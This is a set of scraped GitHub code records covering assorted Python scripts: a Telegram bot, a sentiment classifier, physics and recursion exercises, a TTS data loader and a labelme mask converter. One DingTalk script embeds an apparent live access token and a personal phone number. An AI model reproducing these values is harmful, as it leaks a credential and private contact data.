forward_from is the original\n # user, but the original chat is lost\n self.cmdForwardedMessage(msg, msg['from'],\n msg['forward_from'])\n\n try:\n cmdname, args = text.split(' ', 1)\n except ValueError:\n # no args\n cmdname = text\n args = ''\n # tg specifies that /cmd@nick should work just for us\n if '@' in cmdname:\n cmdname, target = cmdname.split('@', 1)\n if target.lower() != self.username.lower():\n return\n cmdname = cmdname.lower()\n # just silently ignore other commands: they may be directed to\n # other bots\n if cmdname in commands:\n commands[cmdname](args, msg['chat'], msg['from'])\n\n def cmdHelp(self, text, chat, user):\n \"\"\"Respond in the chat with the command list.\"\"\"\n self.conn.sendMessage(chat['id'], self.helpMsg())\n\n def cmdStart(self, text, chat, user):\n \"\"\"Was this suggested by the protocol or something?\"\"\"\n self.conn.sendMessage(chat['id'], 'please stop')\n\n def cmdKeulii(self, text, chat, user):\n \"\"\"Query for a keulii msg.\"\"\"\n target, response = self.keulii.get(chat['id'], user['id'], text)\n if response is not None:\n self.conn.sendMessage(target, response)\n\n def cmdKeuliiRegister(self, text, chat, user):\n \"\"\"Register this chat to the keulii broadcast list.\"\"\"\n # public and private registrations are accepted, chat is one of them\n title = getChatDesc(chat)\n if self.mopoposter_broadcast.get(chat['id'], None):\n self.conn.sendMessage(user['id'],\n 'Pöh, keuliiviestit jo rekisteröity (' + title + ')')\n else:\n self.mopoposter_broadcast[chat['id']] = user['id']\n self.saveMopoposterBroadcast()\n self.conn.sendMessage(user['id'],\n 'OK, keuliiviestit rekisteröity: ' + title)\n\n def cmdKeuliiUnRegister(self, text, chat, user):\n \"\"\"Unregister this chat from the keulii broadcast list.\n\n Others can re-register immediately and the ownership changes then.\n \"\"\"\n title = getChatDesc(chat)\n owner = self.mopoposter_broadcast.get(chat['id'], None)\n if owner == user['id']:\n del self.mopoposter_broadcast[chat['id']]\n self.saveMopoposterBroadcast()\n self.conn.sendMessage(user['id'],\n 'OK, keuliiviestejä ei enää lähetetä: ' + title)\n elif owner is None:\n self.conn.sendMessage(user['id'],\n 'Pöh, keuliiviestejä ei rekisteröity (' + title + ')')\n else:\n self.conn.sendMessage(user['id'],\n 'Pöh, keuliiviestit on rekisteröinyt joku muu (' + title + ')')\n\n def cmdMopoposterPost(self, text, chat, user):\n self.conn.sendMessage(user['id'],\n 'Ei toimi vielä')\n\n def cmdQuote(self, text, chat, user):\n \"\"\"Query for a quote.\"\"\"\n target, response = self.quotes.get(chat['id'], user['id'], text)\n if isinstance(response, TgQuote):\n # the from-id is somehow paired to the msgid, but doesn't seem to\n # show in the chat ui (or the forward_from field). can't send the\n # msg if from-id is wrong.\n self.conn.forwardMessage(target, response.adder['id'], response.msgid)\n elif response is not None:\n # nag the user\n self.conn.sendMessage(target, response)\n\n def cmdForwardedMessage(self, msg, user, fwd_from):\n \"\"\"Received a private forward, interpreted as a quote to be added\"\"\"\n chat = self.last_addq_chat.get(user['id'])\n if chat is None:\n self.conn.sendMessage(user['id'],\n 'Virhe: Mistä tämä tuli? 
Merkitse keskustelukanava ensin komentamalla siellä /addq')\n            return\n\n        msgid = msg['message_id']\n        text = msg['text']\n\n        quote = TgQuote(fwd_from, msgid, text, user)\n        self.quotes.addQuote(chat['id'], quote)\n\n        self.conn.sendMessage(chat['id'],\n                'addq ({} lisäsi) {}: {}'.format(getUserDesc(user), getUserDesc(fwd_from), text))\n\n        del self.last_addq_chat[user['id']]\n\n    def cmdAddQuote(self, text, chat, user):\n        \"\"\"addq marks the chat to record the next forward on\"\"\"\n        self.last_addq_chat[user['id']] = chat\n        title = getChatDesc(chat)\n        self.conn.sendMessage(user['id'],\n                'addq: Forwardaa viesti niin tallennan (' + title + ')')\n\ndef main():\n    logging.basicConfig(filename='debug.log', level=logging.DEBUG,\n            format='%(asctime)s [%(levelname)-8s] %(message)s')\n    token = open(TOKEN_TXT).read().strip()\n    bot = AskibotTg(tgbot.TgbotConnection(token), KEULII_TXT,\n            MOPOPOSTERPORT, QUOTES_DIR)\n    print(bot.conn.getMe())\n    bot.run()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"sooda/askibot-tg","sub_path":"askibot.py","file_name":"askibot.py","file_ext":"py","file_size_in_byte":14747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6972204709","text":"import requests\nimport json\nimport urllib.parse\nurl = 'https://oapi.dingtalk.com/robot/send?access_token=faa8a4758761fff3c9a2269a0cacb573d2a906de9c1b74f0bf8e400251ebdcf0'\nHEADERS = {\n\"Content-Type\": \"application/json ;charset=utf-8 \"\n}\n\nString_textMsg = {\n    \"msgtype\": \"text\",\n    \"text\": {\n        \"content\": \"我就是我, @18612697503 是不一样的烟火\"\n    },\n    \"at\": {\n        \"atMobiles\": [\n            \"18612697503\"\n        ], \n        # \"isAtAll\": \"true\"\n    }\n    }\n\nString_textMsg = json.dumps(String_textMsg)\nres = requests.post(url, data=String_textMsg, headers=HEADERS)\nprint(res.text)\n\n","repo_name":"305831462/FIRST","sub_path":"webApp/dingTest.py","file_name":"dingTest.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9032688146","text":"#-*- coding: utf-8 -*-\n\n# Step 1: define the features and the target ======================================\nimport pandas as pd\ndf = pd.read_excel('NewData.xlsx',encoding='utf-8')\nX = df[['comment']]\ny = df.sentiment\n\n\n# Step 2: split sentences into words with jieba ===================================\nimport jieba\ndef chinese_cut(mytext): # helper that joins jieba's tokens with spaces\n    return \" \".join(jieba.cut(mytext))\nX['cut_comment'] = X.comment.apply(chinese_cut) # apply segments every comment row\nprint(\"First 5 rows after word segmentation:\")\nprint(X.cut_comment[:5]) # check the first five rows to confirm segmentation worked\n\n\n# Step 3: remove stopwords and turn the words into word vectors ===================\n# 3.1 load the stopwords ====================\ndef get_stopwords(file):\n    with open(file,encoding='utf-8') as f:\n        stopwords = f.read()\n    stopwords_list = stopwords.split('\\n')\n    new_stopwords_list = [i for i in stopwords_list] # keep the stopwords as a list\n    return new_stopwords_list # return the stopwords stored in list form\nstopwords = get_stopwords('stoplist.txt')\nprint(\"Last 10 entries of the stopword list:\")\nprint(stopwords[-10:])\n# 3.2 vectorize ============================\nmax_df = 0.8 # threshold for overly common words\nmin_df = 3 # threshold for overly rare words\nfrom sklearn.feature_extraction.text import CountVectorizer\nvect = CountVectorizer(max_df = max_df, min_df=min_df, token_pattern=u'(?u)\\\\b[^\\\\d\\\\W]\\\\w+\\\\b', stop_words=frozenset(stopwords))# token_pattern works like a regular expression\n# use CountVectorizer to turn the segmented comments X.cut_comment into a DataFrame\nX_train = pd.DataFrame(vect.fit_transform(X.cut_comment).toarray(), columns=vect.get_feature_names())\n\n\n\n
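# NOTE (added comment): CountVectorizer produces raw term counts; swapping in\n# TfidfVectorizer would down-weight very common words -- an untested suggestion,\n# not part of the original script.\n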
# Step 4: split into training and test sets =======================================\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X_train, y, random_state=1)\nprint(\"Training set format after stopword removal and vectorization:\")\nprint(X_train.head())\nprint(\"Training set size after stopword removal and vectorization:\",X_train.shape)\n\n\n\n# Step 5: choose a classifier =====================================================\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import train_test_split,cross_val_score,StratifiedKFold\nfrom sklearn.metrics import classification_report,confusion_matrix,accuracy_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.svm import SVC\nmodels = []\nmodels.append(('LR',LogisticRegression(solver='liblinear',multi_class='ovr')))\nmodels.append(('LDA',LinearDiscriminantAnalysis())) # linear discriminant analysis\nmodels.append(('KNN',KNeighborsClassifier()))\nmodels.append(('CART',DecisionTreeClassifier()))\nmodels.append(('NB',MultinomialNB()))\nmodels.append(('SVM',SVC(gamma='auto')))\nresults = []\nnames = []\nfor name,model in models:\n    kfold = StratifiedKFold(n_splits=5,random_state=1) # k-fold cross-validation\n    cv_results = cross_val_score(model, X_train, y_train, cv=kfold,scoring='accuracy')\n    results.append(cv_results)\n    names.append(name)\n    print('%s:%f[%f]' %(name,cv_results.mean(),cv_results.std()))\n# draw a box plot\nplt.boxplot(results,labels=names)\nplt.title('algorithm comparison')\nplt.show()\n# final choice of classifier: MultinomialNB()\n\n\n# Step 6: predict =================================================================\nmodel = MultinomialNB()\nmodel.fit(X_train,y_train)\ny_predict = model.predict(X_test)\nplt.figure()\nplt.plot(range(len(y_test.iloc[:50])),y_test.iloc[:50],'o',markersize=6)\nplt.plot(range(len(y_predict[:50])),y_predict[:50],'*',markersize=6)\nplt.show()\nprint(\"Prediction accuracy rate:\",accuracy_score(y_test,y_predict))\nprint(\"Confusion matrix:\")\nprint(confusion_matrix(y_test,y_predict))\nprint(\"Classification report:\")\nprint(classification_report(y_test,y_predict))\n\n\n\n","repo_name":"ItsSong/Text-Categorization-and-Topic-mining","sub_path":"10TrainPredict.py","file_name":"10TrainPredict.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20189882917","text":"from numpy import *\r\nimport matplotlib.pyplot as plt\r\n\r\nclass BINARY(object):\r\n    def __init__(self, _m1=4*pi*pi, _me=3.*10**(-6), _mj=9.5*10**(-1), _ve0=[0,2.*pi], _vj0=[0,0.88*pi], _dt=0.0001, _time=13):\r\n        self.m1=_m1 \r\n        self.me=_me\r\n        self.mj=_mj\r\n        self.x1, self.y1= [1.],[0]\r\n        self.vx1, self.vy1= [_ve0[0]],[_ve0[1]]\r\n        self.x2, self.y2= [5.2],[0]\r\n        self.vx2, self.vy2=[_vj0[0]], [_vj0[1]]\r\n        self.dt=_dt\r\n        self.time= _time\r\n        self.n=int(_time/_dt)\r\n    def cal(self):\r\n        for i in range(self.n):\r\n            self.re=sqrt(self.x1[-1]**2+self.y1[-1]**2)\r\n            self.rj=sqrt(self.x2[-1]**2+self.y2[-1]**2)\r\n            self.rej=sqrt((self.x1[-1]-self.x2[-1])**2+(self.y1[-1]-self.y2[-1])**2)\r\n            self.vx1.append(self.vx1[-1]+self.dt*(-self.m1*self.x1[-1]/self.re**3-self.m1*self.mj*(self.x1[-1]-self.x2[-1])/self.rej**3))\r\n            self.vy1.append(self.vy1[-1]+self.dt*(-self.m1*self.y1[-1]/self.re**3-self.m1*self.mj*(self.y1[-1]-self.y2[-1])/self.rej**3))\r\n
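            # NOTE (added comment): explicit Euler updates -- each velocity change sums\r\n            # the Sun's gravity and the Earth-Jupiter interaction term, then the new\r\n            # velocities advance the positions below.\r\n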
            self.vx2.append(self.vx2[-1]+self.dt*(-self.m1*self.x2[-1]/self.rj**3-self.m1*self.me*(self.x2[-1]-self.x1[-1])/self.rej**3))\r\n            self.vy2.append(self.vy2[-1]+self.dt*(-self.m1*self.y2[-1]/self.rj**3-self.m1*self.me*(self.y2[-1]-self.y1[-1])/self.rej**3))\r\n            self.x1.append(self.x1[-1]+self.dt*self.vx1[-1])\r\n            self.y1.append(self.y1[-1]+self.dt*self.vy1[-1])\r\n            self.x2.append(self.x2[-1]+self.dt*self.vx2[-1])\r\n            self.y2.append(self.y2[-1]+self.dt*self.vy2[-1])\r\n    def plot_trajectory(self,_ax):\r\n        _ax.plot(self.x1,self.y1,'-b')\r\n        _ax.plot(self.x2,self.y2,'-g')\r\n        _ax.plot([self.x1[-1]],[self.y1[-1]],'ob',markersize=8)\r\n        _ax.plot([self.x2[-1]],[self.y2[-1]],'og',markersize=10)\r\n        _ax.plot(0,0,'or',markersize=15)\r\n        \r\n        \r\nax1=plt.axes([0.1,0.1,0.7,1.0])\r\nax1.set_xlabel(r'$x$'+' (AU)',fontsize=18)\r\nax1.set_ylabel(r'$y$'+' (AU)',fontsize=18)\r\nax1.set_title('three body orbits',fontsize=18)\r\nax1.text(-5.9,5.3,'$M_J=1000M_J$',fontsize=18)\r\n\r\n\r\ncmp=BINARY()\r\ncmp.cal()\r\ncmp.plot_trajectory(ax1)\r\n\r\nplt.show()","repo_name":"zilongstein/computationalphysics_N2013301020055","sub_path":"chapter4/three body.py","file_name":"three body.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73372184856","text":"\"\"\"\n\"\"\"\n\"\"\"\nWhile loop\n\nCertain program sections can be repeated. This is realized e.g. with the while loop.\n\"\"\"\n\"\"\"\n# Example 1:\nn = 0\nwhile n < 3:\n    print(\"Hello world\")\n    n+= 1\n\n# Exercise 1:\nrepetition = int(input(\"Please enter how often the output should be repeated.\"))\n\nloop_count = 0\nwhile loop_count < repetition:\n    print(\"Hello you.\")\n    loop_count +=1\nprint(\"The loop was executed \", loop_count, \" times.\")\n\n# Task 2:\nrepetition = int(input(\"Please enter how often the output should be repeated.\"))\nname = input(\"Please enter your name.\")\nloop_count = 0\nwhile loop_count < repetition:\n    print(\"Hello \" + name)\n    loop_count += 1\nprint(\"The loop was executed \", loop_count, \" times.\")\n\n# Task 3:\nwalked_km = float(input(\"Please enter how many km you walked.\"))\nnumber_of_steps = int((walked_km * 1000 * 100) / 74)\n\nif number_of_steps < 1:\n    print(\"You did not take a single step.\")\nelif number_of_steps == 1:\n    print(\"You took exactly one step.\")\nelse:\n    print(\"For \", walked_km, \"km you took \", number_of_steps, \" steps.\")\n\n# Task 4\n\nyear = int(input(\"Please enter the year: \"))\n\nif year % 100 == 0:\n    if year % 400 == 0:\n        print(\"It is a leap year.\")\n    else:\n        print(\"It is not a leap year.\")\nelse:\n    if year % 4 == 0:\n        print(\"It is a leap year.\")\n    else:\n        print(\"It is not a leap year.\")\n\n# Task 5:\n# read the desired number\n num = int(input(\"Enter a number up to which the Fibonacci sequence should be generated: \"))\n if num < 0:\n    print(\"Please enter a non-negative number.\")\n else:\n    a = 0\n    b = 1\n    while a <= num:\n        print(a,end= \" \")\n        temp = a\n        a = b\n        b = temp + b\n\n
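# NOTE (added comment): Task 6 below solves the same input-validation problem\n# twice -- first with break/continue, then with a boolean loop flag.\n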
\")\n break\n\n if num < 1 or num > 100:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n continue\n num_2 = int(input(\"Geben Sie nun eine weitere Zahl ein: \"))\n\n if num_2 < 1 or num > 100:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n continue\n if num_2 > num:\n print(\"Die aktuelle Eingabe ist größer als die letzte Eingabe.\")\n elif num_2 == num:\n print(\"Die aktuelle Eingabe entspricht der letzten Eingabe.\")\n elif num_2 < num:\n print(\"Die aktuelle Eingabe ist kleiner als die letzte Eingabe.\")\n else:\n print(\"Da ist ein Fehler aufgetreten.\")\n\"\"\"\n# ohne Break; Continue\nloop_on = True\nwhile loop_on:\n num = int(input(\"Geben Sie eine ganze Zahl zwischen 1 und 100 ein: \"))\n if num == 0:\n print(\"Programmabbruch! \")\n loop_on = False\n else:\n if num < 1 or num > 100:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n else:\n num_2 = int(input(\"Geben Sie nun eine weitere Zahl ein: \"))\n if (num_2 < 1 or num_2 > 100) and num_2 != 0:\n print(\"Bitte geben Sie eine Zahl zwischen 1 und 100 ein.\")\n elif num_2 == 0:\n print(\"Programmabbruch! \")\n loop_on = False\n else:\n if num_2 > num:\n print(\"Die aktuelle Eingabe ist größer als die letzte Eingabe.\")\n elif num_2 == num:\n print(\"Die aktuelle Eingabe entspricht der letzten Eingabe.\")\n elif num_2 < num:\n print(\"Die aktuelle Eingabe ist kleiner als die letzte Eingabe.\")\n else:\n print(\"Da ist ein Fehler aufgetreten.\")\n\n\n","repo_name":"cisick/PG2","sub_path":"While-Schleife.py","file_name":"While-Schleife.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35058626518","text":"#-*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nfrom hyperparams import Hyperparams as hp\nimport numpy as np\nimport tensorflow as tf\nfrom utils import *\nimport codecs\nimport os\nfrom jamo import h2j\nfrom itertools import chain\n\ndef load_vocab():\n char2idx = {char: idx for idx, char in enumerate(hp.vocab)}\n idx2char = {idx: char for idx, char in enumerate(hp.vocab)}\n return char2idx, idx2char\n\ndef load_data(mode=\"train\"):\n '''Loads data\n Args:\n mode: \"train\" or \"synthesize\".\n '''\n # Load vocabulary\n char2idx, idx2char = load_vocab()\n\n # load conversion dictionaries\n j2hcj, j2sj, j2shcj = load_j2hcj(), load_j2sj(), load_j2shcj()\n\n # Parse\n fpaths, text_lengths, texts = [], [], []\n transcript = os.path.join(hp.data, 'jss.v1.0.txt')\n lines = codecs.open(transcript, 'r', 'utf-8').readlines()\n if mode == \"train\":\n lines = lines[:-100]\n else:\n lines = lines[-100:]\n\n for line in lines:\n fname, text = line.strip().split(\"|\")\n fpath = os.path.join(hp.data, fname)\n fpaths.append(fpath)\n\n text += \"␃\" # ␃: EOS\n if hp.token_type == \"char\": # syllable\n text = list(text)\n else:\n text = [h2j(char) for char in text]\n text = chain.from_iterable(text)\n if hp.token_type == \"j\": # jamo\n text = [h2j(char) for char in text]\n elif hp.token_type == \"sj\": # single jamo\n text = [j2sj.get(j, j) for j in text]\n elif hp.token_type == \"hcj\": # hangul compatibility jamo\n text = [j2hcj.get(j, j) for j in text]\n elif hp.token_type == \"shcj\": # single hangul compatibility jamo\n text = [j2shcj.get(j, j) for j in text]\n text = chain.from_iterable(text)\n\n text = [char2idx[char] for char in text if char in char2idx]\n text_lengths.append(len(text))\n if mode == \"train\":\n texts.append(np.array(text, np.int32).tostring())\n 
        else:\n            texts.append(text + [0]*(hp.max_N-len(text)))\n\n    return fpaths, text_lengths, texts\n\ndef get_batch():\n    \"\"\"Loads training data and put them in queues\"\"\"\n    with tf.device('/cpu:0'):\n        # Load data\n        fpaths, text_lengths, texts = load_data() # list\n        maxlen, minlen = max(text_lengths), min(text_lengths)\n        print(\"maxlen=\", maxlen, \"minlen=\", minlen)\n\n        # Calc total batch count\n        num_batch = len(fpaths) // hp.B\n\n        # Create Queues\n        fpath, text_length, text = tf.train.slice_input_producer([fpaths, text_lengths, texts], shuffle=True)\n\n        # Parse\n        text = tf.decode_raw(text, tf.int32) # (None,)\n\n        fname, mel, mag, t = tf.py_func(load_spectrograms, [fpath], [tf.string, tf.float32, tf.float32, tf.int64])\n        gt, = tf.py_func(guided_attention, [text_length, t], [tf.float32])\n\n        # Add shape information\n        fname.set_shape(())\n        text.set_shape((None,))\n        mel.set_shape((None, hp.n_mels))\n        mag.set_shape((None, hp.n_fft//2+1))\n        gt.set_shape((hp.max_N, hp.max_T))\n\n        # Batching\n        _, (texts, mels, mags, gts, fnames) = tf.contrib.training.bucket_by_sequence_length(\n            input_length=text_length,\n            tensors=[text, mel, mag, gt, fname],\n            batch_size=hp.B,\n            bucket_boundaries=[i for i in range(minlen + 1, maxlen - 1, 40)],\n            num_threads=8,\n            capacity=hp.B*10,\n            dynamic_pad=True)\n\n    return texts, mels, mags, gts, fnames, num_batch\n","repo_name":"kakaobrain/jejueo","sub_path":"speech/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"68"} +{"seq_id":"40102731601","text":"import cv2\nimport numpy as np\nfrom pathlib import Path\nfrom typing import Dict, List, Set, Tuple\nfrom utils.image_tool import base64_to_img, save_img\nfrom utils.json_util import load_json\nfrom utils.text_tool import load_lines\n\nDEFAULT_IDX = 255\n\n\ndef txt_to_label(txt_path: str) -> Dict[str, int]:\n\n    if txt_path is None:\n        return {}\n\n    labels = load_lines(txt_path)\n    label_to_idx: Dict[str, int] = dict()\n    for idx, label in enumerate(labels):\n        label_to_idx[label] = idx + 1\n\n    return label_to_idx\n\n\ndef gen_ori_img(\n        anno: dict,\n        target_shape: Tuple[int,\n                            int]) -> Tuple[np.ndarray, int, int, int, int, float]:\n\n    # 1. Decode the Base64 payload into an image\n    img_base64 = anno.get('imageData')\n    img = base64_to_img(img_base64)\n\n    # 2. Compute the new image size ratio\n    h, w, _ = img.shape\n    w_target, h_target = target_shape\n\n    h_ratio = h_target / h\n    w_ratio = w_target / w\n    ratio = min(h_ratio, w_ratio)\n\n    new_h = int(h * ratio)\n    new_w = int(w * ratio)\n\n    # 3. Resize the image\n    img_resize = cv2.resize(img, (new_w, new_h), interpolation=cv2.INTER_AREA)\n\n    # 4. Compute the borders\n    top = int((h_target - new_h) / 2)\n    bottom = h_target - new_h - top\n    left = int((w_target - new_w) / 2)\n    right = w_target - new_w - left\n\n    # 5. Pad the image borders\n    img_filled = cv2.copyMakeBorder(img_resize,\n                                    top,\n                                    bottom,\n                                    left,\n                                    right,\n                                    cv2.BORDER_CONSTANT,\n                                    value=(127, 127, 127))\n\n    return img_filled, top, bottom, left, right, ratio\n\n\ndef gen_mask(anno: dict, label_to_idx: Dict[str, int],\n             target_shape: Tuple[int, int], top: int, left: int,\n             ratio: float) -> np.ndarray:\n\n    # 1. Get the annotation shapes\n    shapes = anno.get('shapes')\n\n    # 2. Collect all label kinds\n    label_idxs: Set[int] = set()\n    for shape in shapes:\n        label = shape.get('label')\n        label_idx = label_to_idx.get(label) or DEFAULT_IDX\n        label_idxs.add(label_idx)\n\n
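    # NOTE (added comment): the label set is collected first so that one blank\n    # canvas can be allocated per label before any contour is drawn.\n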
    # 3. Generate the masks\n    # create a blank image for each label\n    label_to_mask: Dict[str, np.ndarray] = dict()\n    for label_idx in label_idxs:\n        mask = np.zeros((target_shape[1], target_shape[0], 1), np.uint8)\n        label_to_mask[label_idx] = mask\n\n    # draw the annotation data (filled contours)\n    for shape in shapes:\n\n        # get the label index\n        label = shape.get('label')\n        label_idx = label_to_idx.get(label) or DEFAULT_IDX\n\n        # get the contour points\n        points = shape.get('points')\n        resize_points: List[List[float, float]] = list()\n        for point in points:\n\n            # compute the new point coordinates\n            x, y = point\n            x = (x * ratio) + left\n            y = (y * ratio) + top\n            resize_points.append([x, y])\n\n        # draw the contour\n        np_points = np.array(resize_points, np.int32)\n        mask = label_to_mask.get(label_idx)\n        mask = cv2.drawContours(mask, [np_points],\n                                -1,\n                                255,\n                                -1,\n                                lineType=cv2.LINE_AA)\n        label_to_mask[label_idx] = mask\n\n    # 3. Merge the masks, setting anti-aliased pixels to the label index\n    # NOTE: to handle the table's horizontal and vertical lines, overlapping pixels are set to 3, so background=0, horizontal line=1, vertical line=2, overlap=3\n    final_mask = np.zeros((target_shape[1], target_shape[0], 1), np.uint8)\n    for label_idx, mask in label_to_mask.items():\n        mask[mask > 0] = label_idx\n        final_mask = final_mask + mask\n\n    return final_mask\n\n\ndef anno_to_mask(\n        anno_dir: str,\n        label_path: str,\n        out_img_dir: str,\n        out_mask_dir: str,\n        target_shape: Tuple[int, int] = (512, 512)) -> None:\n\n    # 1. Find the annotation files\n    anno_paths = Path(anno_dir).rglob('*.json')\n\n    # 2. Load the label data\n    label_to_idx = txt_to_label(label_path)\n\n    # 3. Process the annotations\n    for anno_path in anno_paths:\n\n        # load the annotation\n        anno = load_json(anno_path)\n        if not anno:\n            continue\n\n        # original image\n        img_filled, top, bottom, left, right, ratio = gen_ori_img(\n            anno, target_shape)\n        img_spath = Path(out_img_dir, f'{anno_path.stem}.jpg')\n        save_img(img_filled, img_spath)\n\n        # Mask\n        mask = gen_mask(anno, label_to_idx, target_shape, top, left, ratio)\n        mask_spath = Path(out_mask_dir, f'{anno_path.stem}_mask.png')\n        save_img(mask, mask_spath)\n\n\nif __name__ == '__main__':\n\n    # 1. Set up the arguments\n    import argparse\n    parser = argparse.ArgumentParser(\n        description='A tool for converting labelme json to mask images')\n    parser.add_argument('-a',\n                        '--anno_dir',\n                        type=str,\n                        default='./json',\n                        required=False,\n                        help='Directory to label json files')\n    parser.add_argument('-l',\n                        '--label_path',\n                        type=str,\n                        default='./label.txt',\n                        required=False,\n                        help='Path to label text(one label per line)')\n    parser.add_argument('-oi',\n                        '--out_img_dir',\n                        type=str,\n                        default='./data/imgs',\n                        required=False,\n                        help='Directory to output image files')\n    parser.add_argument('-om',\n                        '--out_mask_dir',\n                        type=str,\n                        default='./data/masks',\n                        required=False,\n                        help='Directory to output mask files')\n\n    args = parser.parse_args()\n\n
    # 2. Run the conversion\n    anno_to_mask(args.anno_dir, args.label_path, args.out_img_dir,\n                 args.out_mask_dir)\n","repo_name":"rinku-1998/labelme-to-maskimg","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19351598089","text":"def factorialRecur(num):\n    \"\"\" Take in an integer and return the result of its factorial product using recursion.\"\"\"\n\n    # Base Case\n    if num == 1:\n        return 1\n\n    # recursion in the return statement with num-1 as its argument\n    return num * factorialRecur(num-1)\n\n\ndef factorialIter(num):\n    \"\"\" Take in an integer and return the result of its factorial product using iteration.\"\"\"\n\n    total = 1\n\n    for i in range(1, num+1):\n        total *= i\n\n    return total\n\n\nnum = 5\nprint(f\"Recursion: num = {num}, result = {factorialRecur(num)}\")\nprint(f\"Iteration: num = {num}, result = {factorialIter(num)}\")\n\n\n# % from Al Sweigart's youtube video: https://youtu.be/AfBqVVKg4GE\n# % Using iteration to emulate recursion\n\ncallStack = [] # holding the \"frame objects\"\n# \"Call\" the factorial() function\ncallStack.append({\"instrPtr\": \"start\", \"number\": 7})\nreturnValue = None\n\nwhile len(callStack) > 0:\n    # The body of the \"factorial() function\":\n\n    number = callStack[-1][\"number\"] # Set number \"parameter\"\n    instrPtr = callStack[-1][\"instrPtr\"]\n\n    if instrPtr == \"start\":\n        if number == 1:\n            # * Base Case\n            returnValue = 1\n            callStack.pop() # \"return\" from \"function call\"\n            continue\n        else:\n            # * Recursive Case\n            callStack[-1][\"instrPtr\"] = \"after recursive call\"\n            # \"Call\" the \"factorial() function\":\n            callStack.append({\"instrPtr\": \"start\", \"number\": number-1})\n            continue\n    elif instrPtr == \"after recursive call\":\n        returnValue *= number\n        callStack.pop() # \"return\" from \"function call\"\n\n# print(returnValue)\n\n# @ Tail Call Optimization/Elimination (TCO)\n# @ In code, tail call optimization/elimination is when the recursive function call is the last thing in the function before it returns:\n# @ def recursiveFunc(params):\n# @     # blah blah blah\n# @     return recursiveFunc(params)\n# @\n# @ You won't need to hold on to local variables, because there's no code after the recursive call that will need them\n# @\n# @ There is no need to keep the frame object on the call stack\n# @\n# @ TCO prevents stack overflow since you can go beyond 1000 function calls\n# @\n# @ Example:\n\n\ndef factorial(number, accumulator=1): # will only run up to number=997\n    if number == 0:\n        # BASE CASE\n        return accumulator\n    else:\n        # RECURSIVE CASE\n        return factorial(number-1, number*accumulator)\n\n\n# print(factorial(997))\n","repo_name":"ichan266/Code-Challenges","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24816529585","text":"import sys\n\nwith open(sys.argv[1], 'r') as f:\n    tiles_raw = f.read().strip().split('\\n\\n')\n\ntiles = {}\n\nfor raw_tile in tiles_raw:\n    lines = raw_tile.strip('\\n').split('\\n')\n    idn = int(lines[0].split()[1].strip(':'))\n    grid = lines[1:]\n    sides = [\n\t\t\tgrid[0],\n\t\t\tgrid[-1],\n\t\t\t''.join([g[0] for g in grid]),\n\t\t\t''.join([g[-1] for g in grid])\n\t\t]\n    sides += [s[::-1] for s in sides]\n    tiles[idn] = {\"grid\": grid, \"sides\": sides, 'neighbors': {}}\n\n    for i, tile in tiles.items():\n        if i == idn:\n            continue\n        shared = 
[s for s in tile['sides'] if s in sides]\n for s in shared:\n tiles[idn]['neighbors'][i] = s\n tiles[i]['neighbors'][idn] = s\n\n# With that information, finding the corners is just finding the tiles with only two neighbors:\n\ncorners = list(map(int, [t for t in tiles if len(tiles[t]['neighbors']) == 2]))\nres = 1\nfor c in corners:\n res *= c\n\nprint(f'Part 1: {res}')\n","repo_name":"bobrippling/advent-of-code","sub_path":"2020/20/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"6590819196","text":"r\"\"\"\nGeneric dynamical systems on schemes\n\nThis is the generic class for dynamical systems and contains the exported\nconstructor functions. The constructor functions can take either polynomials\n(or rational functions in the affine case) or morphisms from which to\nconstruct a dynamical system. If the domain is not specified, it is\nconstructed. However, if you plan on working with points or subvarieties\nin the domain, it recommended to specify the domain. For products of\nprojective spaces the domain must be specified.\n\nThe initialization checks are always performed by the constructor functions.\nIt is possible, but not recommended, to skip these checks by calling the\nclass initialization directly.\n\nAUTHORS:\n\n- Ben Hutz (July 2017): initial version\n\"\"\"\n\n#*****************************************************************************\n# Copyright (C) 2017 Ben Hutz \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n# as published by the Free Software Foundation; either version 2 of\n# the License, or (at your option) any later version.\n# http://www.gnu.org/licenses/\n#*****************************************************************************\n\nfrom __future__ import absolute_import, print_function\nfrom sage.categories.homset import End\nfrom six import add_metaclass\nfrom sage.misc.inherit_comparison import InheritComparisonClasscallMetaclass\nfrom sage.schemes.generic.morphism import SchemeMorphism_polynomial\nfrom sage.schemes.affine.affine_space import is_AffineSpace\nfrom sage.schemes.affine.affine_subscheme import 